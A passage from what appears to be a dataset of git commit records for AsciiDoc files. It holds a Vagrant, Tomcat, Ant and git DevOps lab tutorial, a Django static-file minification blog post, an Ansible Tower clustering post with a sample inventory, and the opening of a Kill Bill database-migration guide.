Write it down.\n\n****\nONLY *if you miss your port*, or can't find it, you will need to do:\n\n vboxmanage list vms\n\nYou should see output including something like:\n\n\"Calavera_manos_XXXXXXXXXXXXX_XXXXX\" {389dab0f-2f52-434e-bf50-c9792c42416a}\n\nGo:\n\n vboxmanage showvminfo Calavera_manos_XXXXXXXXXXXXX_XXXXX|more (replacing the X's with the actual numbers, you should cut and paste)\n\nLook for this line:\n\n....\nNIC 1 Rule(3): name = tcp8134, protocol = tcp, host ip = , host port = XXXX, guest ip = , guest port = 8080\n....\n\nCopy down the \"XXXX.\"\n****\n\nOnce you have your port 8080 mapping and the Vagrant launching process is complete, you can access your VM's web server. Manos comes preconfigured with a running Tomcat instance and a simple test-harness based Java application. You can see it running when you ssh into the VM:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ vagrant ssh manos\nWelcome to Ubuntu 14.04.2 LTS (GNU\/Linux 3.13.0-24-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\/\nLast login: Sat Feb 21 22:03:53 2015 from 10.0.2.2\n....\n\nNext, run the curl command pointing at the running web application:\n....\nvagrant@manos:~$ curl localhost:8080\/MainServlet\n<h1>This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\nWhat is \"curl\"? curl is like a web browser for the command line.\nFor more read @ http:\/\/curl.haxx.se\/docs\/manpage.html\n\nYou can also see the same thing from OUTSIDE your virtual machine:\n\n....\nvagrant@manos:~$ exit\nlogout\nConnection to 127.0.0.1 closed.\ntest4@seis660:~\/Calavera$ curl 127.0.0.1:2203\/MainServlet\n<h1>This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\n\nIMPORTANT: Instead of typing 2203 for the port number, you should substitute the port number that 8080 was mapped to by Vagrant.\n\nFinally, you can view it in a real browser over X windows.\n\nNOTE: You may not find much use for X-windows in the outside world, but it is helpful here as it prevents us from worrying about hardening the local Vagrant VMs.\n\nFirst, be sure you logged into the server with X enabled. You need to either:\n\n* Check the box in Putty \/\/ For people using xming 6.9 above, there will be enable x11 forwarding checkbox under ssh.\n* go \"ssh -X YourStudentID@serverXXX\" if you are using your Mac console\n\nNOTE: You do *not* need Firefox on your local laptop for this to work. You *do* need to have X11 forwarding working, with a local Xwindows display. For example, if XMing is installed, open XLaunch and click through the screens with the defaults. See also https:\/\/github.com\/dm-academy\/aitm-labs\/blob\/master\/Lab-00\/00-tech-lab.adoc[Lab 00], Configuring X-Windows.\n\nType \"xclock\" for a quick test. See https:\/\/github.com\/dm-academy\/aitm-labs\/blob\/master\/Lab-00\/00-tech-lab.adoc[Configuring X-Windows] in Lab 00.\n\nAt the command line, go:\n....\nYourStudentID@serverXXX:~$ firefox -no-remote \"127.0.0.1:2203\/MainServlet\"\n\n(process:46597): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed\nGtk-Message: Failed to load module \"canberra-gtk-module\"\n....\n\nIt will throw a lot of errors, ignore them. You should (slowly) get a Firefox browser painted on your screen. 
This is X-windows in action, Firefox is actually running on the server.\n\nimage::browser2.png[]\n\nYou can either close Firefox or hit Command-C to exit.\n\nExit your VM.\n\n== A look at the application\n\nLet's look at what goes into making this little app work. First, how did it get there? If you are still in your VM, exit from the VM back to the classroom server. Be sure you are in the Calavera directory.\n\nYou can see the resources used by the application if you go:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ tree cookbooks\/manos\/\ncookbooks\/manos\/\n\u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 build.xml\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 INTERNAL_gitignore\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 TestClass1.java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u251c\u2500\u2500 metadata.rb\n\u2514\u2500\u2500 recipes\n \u2514\u2500\u2500 default.rb\n....\n\nNow, the cookbook here includes the raw ingredients (the contents of the cookbooks\/manos\/files directory) as well as the recipes of how to set them up on the VM. Especially, have a look at cookbooks\/manos\/recipes\/default.rb:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ more cookbooks\/manos\/recipes\/default.rb\n# manos-default\n\n# set up developer workstation\n\n# assuming Chef has set up Java, Tomcat, ant and junit\n# need to establish directory structure\n# move source code over\n\npackage \"tree\"\n\ngroup 'git'\n\nuser 'vagrant' do\n group 'git'\nend\n\n[\"\/home\/hijo\/src\/main\/config\",\n \"\/home\/hijo\/src\/main\/java\/biz\/calavera\",\n \"\/home\/hijo\/src\/test\/java\/biz\/calavera\",\n \"\/home\/hijo\/target\/biz\/calavera\"].each do | name |\n\n directory name do\n mode 00775\n action :create\n user \"vagrant\"\n group \"git\"\n recursive true\n end\nend\n\nfile_map = {\n \"INTERNAL_gitignore\" => \"\/home\/hijo\/.gitignore\",\n \"build.xml\" => \"\/home\/hijo\/build.xml\",\n \"web.xml\" => \"\/home\/hijo\/src\/main\/config\/web.xml\",\n \"Class1.java\" => \"\/home\/hijo\/src\/main\/java\/biz\/calavera\/Class1.java\",\n \"MainServlet.java\" => \"\/home\/hijo\/src\/main\/java\/biz\/calavera\/MainServlet.java\",\n \"TestClass1.java\" => \"\/home\/hijo\/src\/test\/java\/biz\/calavera\/TestClass1.java\"\n}\n\n# download each file and place it in right directory\nfile_map.each do | fileName, pathName |\n cookbook_file fileName do\n path pathName\n user \"vagrant\"\n group \"git\"\n action :create\n end\nend\n\n...\n....\n\nThere is more, but you get the idea. Without going into the https:\/\/en.wikipedia.org\/wiki\/Ruby_(programming_language)[Ruby] code this is written in (which would be too much detail for this class), this script is creating a set of directory structures on the new manos VM and populating them with the basic https:\/\/en.wikipedia.org\/wiki\/Java_(programming_language)[Java] and https:\/\/en.wikipedia.org\/wiki\/Apache_Ant[Ant] files needed. For example, this command:\n\n \"build.xml\" => \"\/home\/hijo\/build.xml\"\n\nsays,\n\n. take the file called `build.xml` from the source files on the host, and\n. 
copy it into `\/home\/hijo\/build.xml` on the guest.\n\nGo back into your manos VM and have a look at the home\/hijo directory:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ vagrant ssh manos\nWelcome to Ubuntu 14.04.2 LTS (GNU\/Linux 3.13.0-24-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\/\nLast login: Sun Feb 22 18:29:29 2015 from 10.0.2.2\n....\n\nNow run the tree command:\n\n....\nvagrant@manos:~$ tree \/home\/hijo\n\/home\/hijo\n\u251c\u2500\u2500 build.xml\n\u251c\u2500\u2500 src\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 main\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 config\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 biz\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 test\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 biz\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 TestClass1.java\n\u2514\u2500\u2500 target\n \u251c\u2500\u2500 biz\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.class\n \u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.class\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 TestClass1.class\n \u251c\u2500\u2500 CalaveraMain.jar\n \u251c\u2500\u2500 result.txt\n \u251c\u2500\u2500 result.xml\n \u2514\u2500\u2500 web.xml\n\n....\n\nThat configured directory tree is the outcome of the Chef scripts that were applied when the first Vagrant up was done.\n\nWithout going deeply into object-oriented programming, this application has three major parts:\n\n. A main class that controls everything (`MainServlet.java`).\n. A class called `Class1.java` that does 2 things:\n.. Returns a string \"five\" when you call the `.five` method on the class\n.. Wraps any string with the tags <H1> and <\/H1>, turning it into an HTML heading 1 string.\n. A test class, `TestClass1.java`, that tests `Class1.java` (but not `MainServlet.java`, just because that gets complicated for a simple exercise like this).\n\nBut wait, there is more. How is Tomcat actually serving up the servlet?\n\nRun tree:\n\n....\nvagrant@manos:\/home\/hijo$ tree \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/\n\/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/\n\u251c\u2500\u2500 lib\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 CalaveraMain.jar\n\u2514\u2500\u2500 web.xml\n\n1 directory, 2 files\n....\n\nIn order for the `CalaveraMain.jar` file to be served up, it needs to be put in the `WEB-INF\/lib` directory that Tomcat knows about, and the `web.xml` file needs to be updated as well. How did this happen?\n\nAnd as a matter of fact, where did that `CalaveraMain.jar` file come from, anyways? It wasn't part of the files stored in the cookbook...!? Go back and look.\n\nThis is where the magic of Ant comes in. `CalaveraMain.jar` is a **compiled and packaged** version of the java classes you see in the `java\/biz\/calavera` directory.\n\nBack when Java first came out, the developer would have to painstakingly compile and package the software by hand, move it manually to the Tomcat directory, and restart Tomcat. But with Ant (and similar tools like https:\/\/maven.apache.org\/[Maven]), we can do this all automatically. 
Go:\n\n....\nvagrant@manos:~$ cd \/home\/hijo\/\nvagrant@manos:\/home\/hijo$ sudo ant\nBuildfile: \/home\/hijo\/build.xml\n\ninit:\n [echo]\n [echo] \t\t\tComputer name is ${my_env.COMPUTERNAME}\n [echo] User name is root\n [echo] \t\t\tBuilding from \/home\/hijo\/build.xml\n [echo] \t\t\tJava is version 1.7\n [echo] \t\t\tProject is ${ant.project.name}\n [echo] \t\t\tAnt is Apache Ant(TM) version 1.9.4 compiled on April 29 2014\n [echo] \t\t\tBasedir is \/home\/hijo\n [echo] \t\t\tSource is .\/src\/main\/java\/biz\/calavera\n [echo] \t\t\tBuild target is .\/target\n [echo] \t\t\tDeployment target is \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n\ncompile:\n [javac] Compiling 2 source files to \/home\/hijo\/target\n [javac] Compiling 1 source file to \/home\/hijo\/target\n\ntest:\n [echo]\n [echo] \t\t\tentering test\n [echo]\n [junit] Running biz.calavera.TestClass1\n [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\ncompress:\n [jar] Building jar: \/home\/hijo\/target\/CalaveraMain.jar\n\ndeploy:\n [delete] Deleting directory \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [mkdir] Created dir: \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [copy] Copying 1 file to \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n [echo] \t\t\tAttempting Tomcat restart.\n [echo]\n [exec] The command attribute is deprecated.\n [exec] Please use the executable attribute and nested arg elements.\n [exec] * Stopping Tomcat servlet engine tomcat6\n [exec] ...done.\n [exec] The command attribute is deprecated.\n [exec] Please use the executable attribute and nested arg elements.\n [exec] * Starting Tomcat servlet engine tomcat6\n [exec] ...done.\n\nmain:\n [echo]\n [echo] \t\t\tbuilt and deployed to Tomcat.\n [echo]\n\nBUILD SUCCESSFUL\nTotal time: 8 seconds\n....\n\nTIP: Points to anyone who can rewrite the Ant script so that it's not using the deprecated Ant command attribute generating the warnings at the bottom.\n\nYou can see the Ant script at build.xml. Compare that script to the output. It is:\n\n- Running the junit tests (more on that later)\n- Compiling the java *.java files into *.class files\n- Packaging the *.java files into a *.jar file\n- Moving the jar file to the appropriate Tomcat directory, along with the web.xml configuration file\n- Restarting Tomcat\n\nIf you are interested in Ant further, you can see more about it at http:\/\/ant.apache.org\/.\n\n== Changing the application\n\nLet's play with the Java a little bit. 
Start by editing the MainServlet.java file:\n\n....\nvagrant@manos:\/home\/hijo$ nano src\/main\/java\/biz\/calavera\/MainServlet.java\n\n GNU nano 2.2.6 File: src\/main\/java\/biz\/calavera\/MainServlet.java Modified\n\npackage biz.calavera;\n\n\/\/package test;\n\nimport java.io.*;\nimport javax.servlet.*;\nimport javax.servlet.http.*;\n\npublic class MainServlet extends HttpServlet {\n \/\/ Import required java libraries\n\n private String message;\n\n public void init() throws ServletException\n {\n \/\/ Edit this message, save the file, and rebuild with Ant\n \/\/ to see it reflected on the Web page at http:\/\/localhost:8081\/MainServlet\n message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n }\n\n public void doGet(HttpServletRequest request,\n HttpServletResponse response)\n throws ServletException, IOException\n {\n \/\/ Set response content type\n response.setContentType(\"text\/html\");\n\n \/\/ Actual logic goes here.\n PrintWriter out = response.getWriter();\n Class1 oResp = new Class1(message);\n\n out.println(oResp.webMessage());\n }\n\n public void destroy()\n {\n \/\/ do nothing.\n }\n }\n....\n\nFind the line that says:\n\n message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\"\n\nand change it to\n\n message = \"YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.\"\n\nExit nano and run Ant again:\n\n vagrant@manos:\/home\/hijo$ sudo ant\n [ same output as before ]\n\nNow try:\n\n vagrant@manos:\/home\/hijo$ curl localhost:8080\/MainServlet\n <h1>YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n\nIf you did it correctly, you should see that Tomcat (via curl) is now serving up the change you made. Many automated steps were executed between you making that change and it appearing in curl!\n\nNOTE: If you want to see this in firefox, just open a *new* ssh session to SEIS660 with X enabled and don't go into your VM. Remember to use your specific mapped 8080 port number that Vagrant setup.\n\nLet's add it to git:\n....\nvagrant@manos:\/home\/hijo$ git add src\/main\/java\/biz\/calavera\/MainServlet.java\nvagrant@manos:\/home\/hijo$ git commit -m \"my local java\"\n[master 04ff3cb] my local java\n 1 file changed, 1 insertion(+), 1 deletion(-)\n....\nNOTE: Git is installed, with a repo initialized already in \/home\/hijo. 
If this were a completely new system, you would need to install git and init the repo.\n\nReview your change:\n\n....\nvagrant@manos:\/home\/hijo$ git log -p -1\ncommit 04ff3cb11264ed3429889512451722c3069b3264\nAuthor: Charles Betz <char@calavera.biz>\nDate: Sun Feb 22 19:44:19 2015 +0000\n\n my local java\n\ndiff --git a\/src\/main\/java\/biz\/calavera\/MainServlet.java b\/src\/main\/java\/biz\/calavera\/MainServlet.java\nindex 35cdac4..54f2be4 100644\n--- a\/src\/main\/java\/biz\/calavera\/MainServlet.java\n+++ b\/src\/main\/java\/biz\/calavera\/MainServlet.java\n@@ -15,7 +15,7 @@ public class MainServlet extends HttpServlet {\n {\n \/\/ Edit this message, save the file, and rebuild with Ant\n \/\/ to see it reflected on the Web page at http:\/\/localhost:8081\/MainServlet\n- message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n+ message = \"YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n }\n\n public void doGet(HttpServletRequest request,\n....\n\nHit `q` to get out of the git review.\n\nNow, let's break something.\n\nReview the test class:\n\n....\nvagrant@manos:\/home\/hijo$ more src\/test\/java\/biz\/calavera\/TestClass1.java\npackage biz.calavera;\n\nimport static org.junit.Assert.*;\n\nimport org.junit.After;\nimport org.junit.AfterClass;\nimport org.junit.Before;\nimport org.junit.BeforeClass;\nimport org.junit.Test;\n\npublic class TestClass1 {\n\n\tprivate Class1 a;\n\n\t@BeforeClass\n\tpublic static void setUpBeforeClass() throws Exception {\n\t}\n\n\t@AfterClass\n\tpublic static void tearDownAfterClass() throws Exception {\n\t}\n\n\t@Before\n\tpublic void setUp() throws Exception {\n\t\t this.a = new Class1(\"TestWebMessage\");\n\t}\n\n\t@After\n\tpublic void tearDown() throws Exception {\n\t}\n\n\t@Test\n\tpublic void testTrue() {\n assertTrue(\"assertTrue test\", true); \/\/ true is true\n assertNotNull(\"a is not null\", this.a); \/\/a exists\n assertEquals(\"five is 5\", \"five\", this.a.five()); \/\/a.five = \"five\"\n assertEquals(\"string correctly generated\", \"<h1>TestWebMessage<\/h1>\", this.a.webMessag\ne()); \/\/ string built correctly\n\t}\n\n}\n....\n\nEdit the Class1.java file:\n\n....\nvagrant@manos:\/home\/hijo$ nano src\/main\/java\/biz\/calavera\/Class1.java\n\n GNU nano 2.2.6 File: src\/main\/java\/biz\/calavera\/Class1.java\n\npackage biz.calavera;\n\n\npublic class Class1 {\n String strMsg;\n\n public Class1 (String inString)\n {\n strMsg = inString;\n }\n public String five()\n {\n return \"five\";\n }\n\n public String webMessage()\n {\n return \"<h1>\" + strMsg + \"<\/h1>\";\n }\n\n\n }\n....\n\n\nReplace\n\n return \"five\";\n\nwith\n\n return \"four\";\n\nRebuild with ant:\n\n....\nvagrant@manos:\/home\/hijo$ sudo ant\nBuildfile: \/home\/hijo\/build.xml\n\ninit:\n [echo]\n [echo] \t\t\tComputer name is ${my_env.COMPUTERNAME}\n [echo] User name is root\n [echo] \t\t\tBuilding from \/home\/hijo\/build.xml\n [echo] \t\t\tJava is version 1.7\n [echo] \t\t\tProject is ${ant.project.name}\n [echo] \t\t\tAnt is Apache Ant(TM) version 1.9.4 compiled on April 29 2014\n [echo] \t\t\tBasedir is \/home\/hijo\n [echo] \t\t\tSource is .\/src\/main\/java\/biz\/calavera\n [echo] \t\t\tBuild target is .\/target\n [echo] \t\t\tDeployment target is \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n\ncompile:\n [javac] Compiling 2 source files to \/home\/hijo\/target\n [javac] Compiling 1 source file to \/home\/hijo\/target\n\ntest:\n [echo]\n [echo] 
\t\t\tentering test\n [echo]\n [junit] Running biz.calavera.TestClass1\n [junit] Tests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\nBUILD FAILED\n\/home\/hijo\/build.xml:69: Test biz.calavera.TestClass1 failed\n\nTotal time: 1 second\n....\n\nWe got something quite different - a failed build.\n\n\nWe can see the results this way:\n\n....\nvagrant@manos:\/home\/hijo$ cat target\/result.txt\nTestsuite: biz.calavera.TestClass1\nTests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\nTestcase: testTrue took 0.012 sec\n\tFAILED\nfive is 5 expected:<f[ive]> but was:<f[our]>\njunit.framework.AssertionFailedError: five is 5 expected:<f[ive]> but was:<f[our]>\n\tat biz.calavera.TestClass1.testTrue(Unknown Source)\n....\n\nNotice we can still curl. The broken build was not deployed to the local Tomcat.\n\n....\nvagrant@manos:\/home\/hijo$ curl localhost:8080\/MainServlet\n<h1>YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\n\n\nWhy did this happen? Go back to the test harness and notice the line:\n\n assertEquals(\"five is 5\", \"five\", this.a.five()); \/\/a.five = \"five\"\n\nNOTE: The `\/\/` in the line above indicates a comment in the Java test.\n\nWhat this says is there is a method (a command or instruction) on TestClass1 called \"five,\" and in fact if it is called it should (unsurprisingly) return EXACTLY the string \"`five`\". No more, no less.\n\nIn terms of the JUnit test language, the test ASSERTS that the method `five` invoked on the object `this.a` (which was constructed out of Class1, as you can see at the start of the test class), will be EQUAL to \"five.\" We purposefully broke the test by telling the method to return \"four\".\n\nTest driven development is a critically important part of building applications and you are encouraged to deepen your familiarity with it. This is the simplest, most basic discussion imaginable.\n\nLet's abandon the changes that \"broke the build\":\n\n vagrant@manos:\/home\/hijo$ git reset --hard\n\nThis command discards all changes you have not committed.\n\nDo\n\n cat src\/main\/java\/biz\/calavera\/Class1.java\n\nand you will see \"four\" reverted to \"five.\"\n\nFinally, let's go back to the original version without YourStudentID in the message:\n\n....\nvagrant@manos:\/home\/hijo$ git log --pretty=short --abbrev-commit\ncommit 3b810e4\nAuthor: Charles Betz <char@calavera.biz>\n\n my local java\n\ncommit b45dc90\nAuthor: Charles Betz <char@calavera.biz>\n\n initial commit\n....\n\nNotice in the above the line:\n\n commit 3b810e4\n\nThe string `3b810e4` is the commit hash. https:\/\/git-scm.com\/book\/en\/v2\/Getting-Started-Git-Basics[More on Git hashing & other topics.]\n\nFind the git commit hash associated with your commit by running `git log --pretty=short --abbrev-commit` as in the example above. Then, run the revert command:\n\n....\nvagrant@manos:\/home\/hijo$ git revert <hash>\n....\n\nNOTE: You will need to edit the revert message in nano. Save and exit.\n\n....\n[master b66c1c9] Revert \"my local java\"\n 1 file changed, 1 insertion(+), 1 deletion(-)\n....\n\nSee that \"YourStudentID\" is now removed, as we have reverted to the original version of the code.\n\n....\nvagrant@manos:\/home\/hijo$ cat src\/main\/java\/biz\/calavera\/MainServlet.java\n....\n\nRebuild with ant and check that the original functionality is restored. 
Use Curl again.\n\nExit your VM and destroy it:\n\n vagrant@manos:exit\n YourStudentID@serverXXX:~\/Calavera$ vagrant destroy manos -f\n\n\nCongratulations, you have finished another lab. Next up: an end to end DevOps pipeline.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"67c2920d695bfb760b946498196631d9211207b3","subject":"Update 2015-08-27-Boosting-up-and-managing-static-files-with-Django.adoc","message":"Update 2015-08-27-Boosting-up-and-managing-static-files-with-Django.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2015-08-27-Boosting-up-and-managing-static-files-with-Django.adoc","new_file":"_posts\/2015-08-27-Boosting-up-and-managing-static-files-with-Django.adoc","new_contents":"= Boosting up and managing static files with Django\n:keywords: stati files, python, django, Jo\u00e3o Carvalho, Maestrus, YUI Compressor, bit brushing\n:attribute \"og:image\": image::boosting-static.png[Boosting up statis files with Django]\n\nimage::boosting-static.png[Boosting up and managing static files with Django]\n\n### Lights on fire!\n\nI have good news:\n\n*There a cacheable world outside and we can gain some speed improvement with it.* \n\nWith simple settings, you can do it with Django and NGINX Web server and minify static files, save bandwidth and reduce application network loading time;\n\n\n### What is to minify?\n\nTo minify static files is a process based on remove all unnecessary characters including trailing spaces, spaces between commands and source comments. By doing this, you will boost up your page load.\n\nThere a lot of software to minify files but the minification process will let static files hard to read and maintain. We don't want it, so to had a better approach in this two worlds you must use Django-pipeline application with some of those compression software.\n\nIn this article, I will talk only about Django-pipeline minification behavior with *YUI Compressor*.\n\n","old_contents":"= Boosting up and managing static files with Django\n:keywords: stati files, python, django, Jo\u00e3o Carvalho, Maestrus, YUI Compressor, bit brushing\n:attribute \"og:image\": image::boosting-static.png[Boosting up statis files with Django]\n\nimage::boosting-static.png[Boosting up and managing static files with Django]\n\nLights on fire!\n\nI have good news:\n\nThere a cacheable world outside and we can gain some speed improvement with it. \n\nWith simple settings, you can do it with Django and NGINX Web server and minify static files, save bandwidth and reduce application network loading time;","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"98927ded38e0bb03258bc1cb4fff0602e5983edf","subject":"Update 2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","message":"Update 2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_file":"_posts\/2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_contents":"= Building a highly available Ansible Tower cluster\n:published_at: 2017-03-15\n:hp-tags: ansible, ansible tower, ansible tower cluster\n\nWith the release of Ansible Tower 3.1 a short while back, it became possible to setup Ansible Tower in a highly available, active-active topology. 
You do this by setting up multiple Tower nodes that talk to a shared PostgreSQL database on a separate node. This database can be setup and managed by the Tower installation playbook, or you can manage it yourself.\n\nEach of the Tower nodes will serve up the web front end, so your users can choose which Tower server they use to log into. If you change the configuration through the web UI on one node, the change is visible over all instances through the shared database. For example, uploading a Tower license file to one of the Tower instances will make it show up in all of your Tower cluster nodes.\n\nCluster nodes keep in touch with one another for job scheduling and such through RabbitMQ.\n\nSounds good? That's because it is! And it gets better: setting up a Tower cluster is insanely easy!\n\nAs an example, I have set up a Tower cluster on three nodes: tower01.nontoonyt.lan, tower02.nontoonyt.lan and tower03.nontoonyt.lan. The database will reside on towerdb.nontoonyt.lan. By configuring the inventory in a specific - and quite simple - way, the Tower installation playbooks will build the whole cluster for me. \n\nimage::https:\/\/raw.githubusercontent.com\/wzzrd\/hubpress.io\/gh-pages\/images\/ansible-tower-cluster.png[Tower Cluster Topology, 460, 650,]\n\nThe below snippet is an edited version of the special inventory file we ship in the ansible-tower-setup tarball, called \"inventory_cluster\". \n\n....\n[tower]\ntower01.nontoonyt.lan\ntower02.nontoonyt.lan\ntower03.nontoonyt.lan\n\n[database]\ntowerdb.nontoonyt.lan\n\n[all:vars]\nadmin_password='myPassw0rd'\n\npg_host='towerdb.nontoonyt.lan'\npg_port='5432'\n\npg_database='tower'\npg_username='tower'\npg_password='myPassw0rd'\n\nrabbitmq_port=5672\nrabbitmq_vhost=tower\nrabbitmq_username=tower\nrabbitmq_password='myPassw0rd'\nrabbitmq_cookie=omnomnomnom\n\n# Needs to be true for fqdns and ip addresses\nrabbitmq_use_long_name=true\n....\n\n\nTo invoke setup.sh to perform a cluster installation based on that inventory file, you just run:\n\n....\n# .\/setup.sh -i inventory_cluster\n....\n\nThat's it. Hope you enjoy the new Ansible Tower cluster feature! Take a look at the Youtube screencast that goes with this blog.\n\nvideo::t3VdUjjuv70[youtube]\n\n\n\n\n","old_contents":"= Building a highly available Ansible Tower cluster\n:published_at: 2017-03-15\n:hp-tags: ansible, ansible tower, ansible tower cluster\n\nWith the release of Ansible Tower 3.1 a short while back, it became possible to setup Ansible Tower in a highly available, active-active topology. You do this by setting up multiple Tower nodes that talk to a shared PostgreSQL database on a separate node. This database can be setup and managed by the Tower installation playbook, or you can manage it yourself.\n\nEach of the Tower nodes will serve up the web front end, so your users can choose which Tower server they use to log into. If you change the configuration through the web UI on one node, the change is visible over all instances through the shared database. For example, uploading a Tower license file to one of the Tower instances will make it show up in all of your Tower cluster nodes.\n\nCluster nodes keep in touch with one another for job scheduling and such through RabbitMQ.\n\nSounds good? That's because it is! And it gets better: setting up a Tower cluster is insanely easy!\n\nAs an example, I have set up a Tower cluster on three nodes: tower01.nontoonyt.lan, tower02.nontoonyt.lan and tower03.nontoonyt.lan. The database will reside on towerdb.nontoonyt.lan. 
By configuring the inventory in a specific - and quite simple - way, the Tower installation playbooks will build the whole cluster for me. \n\nimage:\n\n\nThe below snippet is an edited version of the special inventory file we ship in the ansible-tower-setup tarball, called \"inventory_cluster\". \n\n....\n[tower]\ntower01.nontoonyt.lan\ntower02.nontoonyt.lan\ntower03.nontoonyt.lan\n\n[database]\ntowerdb.nontoonyt.lan\n\n[all:vars]\nadmin_password='myPassw0rd'\n\npg_host='towerdb.nontoonyt.lan'\npg_port='5432'\n\npg_database='tower'\npg_username='tower'\npg_password='myPassw0rd'\n\nrabbitmq_port=5672\nrabbitmq_vhost=tower\nrabbitmq_username=tower\nrabbitmq_password='myPassw0rd'\nrabbitmq_cookie=omnomnomnom\n\n# Needs to be true for fqdns and ip addresses\nrabbitmq_use_long_name=true\n....\n\n\nTo invoke setup.sh to perform a cluster installation based on that inventory file, you just run:\n\n....\n# .\/setup.sh -i inventory_cluster\n....\n\nThat's it. Hope you enjoy the new Ansible Tower cluster feature! Take a look at the Youtube screencast that goes with this blog.\n\nvideo::t3VdUjjuv70[youtube]\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"cee8671c98132636705016c0232926564b05924f","subject":"Update database_migrations.adoc","message":"Update database_migrations.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/database_migrations.adoc","new_file":"userguide\/tutorials\/database_migrations.adoc","new_contents":"= Kill Bill Database Migrations\n\n== Overview\n\nA typical Kill Bill deployment is comprised of several components: The core Kill Bill webapp and some plugins. Migrating the software to a higher version may require to migrate one, a few or all the different components and so potentially upgrading the database schema associated with one, a few or all of those components. The compatibility version between core Kill Bill and its plugins depends on the version of the https:\/\/github.com\/killbill\/killbill-plugin-api[plugin api] exported by a given Kill Bill version. The https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM] tool allows to list compatible plugins associated with a given Kill Bill version:\n\n[source,bash]\n----\nkpm info --version <killbill_version>\n----\n\nKill Bill and individual plugins assume specific tables, functions, etc. are installed in your database. The source of truth for the schema (DDL) files are:\n\n* In individual modules for Kill Bill, under `\\*\/src\/main\/resources\/org\/killbill\/billing\/*\/ddl.sql` (for example https:\/\/github.com\/killbill\/killbill\/tree\/master\/account\/src\/main\/resources\/org\/killbill\/billing\/account\/ddl.sql[account\/src\/main\/resources\/org\/killbill\/billing\/account\/ddl.sql]).\n* Under `src\/main\/resources\/ddl.sql` for Java plugins (https:\/\/github.com\/killbill\/killbill-adyen-plugin\/tree\/master\/src\/main\/resources\/ddl.sql[Adyen example]).\n* Under `db\/ddl.sql` for Ruby plugins (https:\/\/github.com\/killbill\/killbill-cybersource-plugin\/tree\/master\/db\/ddl.sql[CyberSource example]).\n\nThese files always contain the latest version, matching the latest code in that specific branch\/tag.\n\nTo access a specific version:\n\n* For Kill Bill itself, we publish a full 